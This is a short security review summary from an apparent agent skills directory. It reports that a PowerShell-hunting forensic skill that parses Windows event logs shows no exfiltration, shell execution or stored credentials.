The Agent Skills Directory

[SAFE]: The skill's code was thoroughly analyzed and found to perform only the forensic analysis tasks described in its documentation. No evidence of hidden malicious logic, obfuscation, or persistence mechanisms was identified.
[EXTERNAL_DOWNLOADS]: The skill identifies dependencies on the python-evtx and lxml Python packages in scripts/agent.py. These are widely used, standard libraries for parsing Windows event logs and processing XML data.
[DATA_EXFILTRATION]: Static analysis of scripts/agent.py confirmed the absence of network communication modules (such as requests, urllib, or socket), ensuring that the analyzed event data remains on the local system.
[COMMAND_EXECUTION]: The script processes data using native Python logic and library calls. It does not utilize subprocess, os.system, or other mechanisms to execute external shell commands.
[CREDENTIALS_UNSAFE]: No hardcoded API keys, passwords, or other sensitive credentials were found within the repository files. The script is designed to detect credential theft keywords in logs rather than storing credentials itself.

hunting-for-anomalous-powershell-execution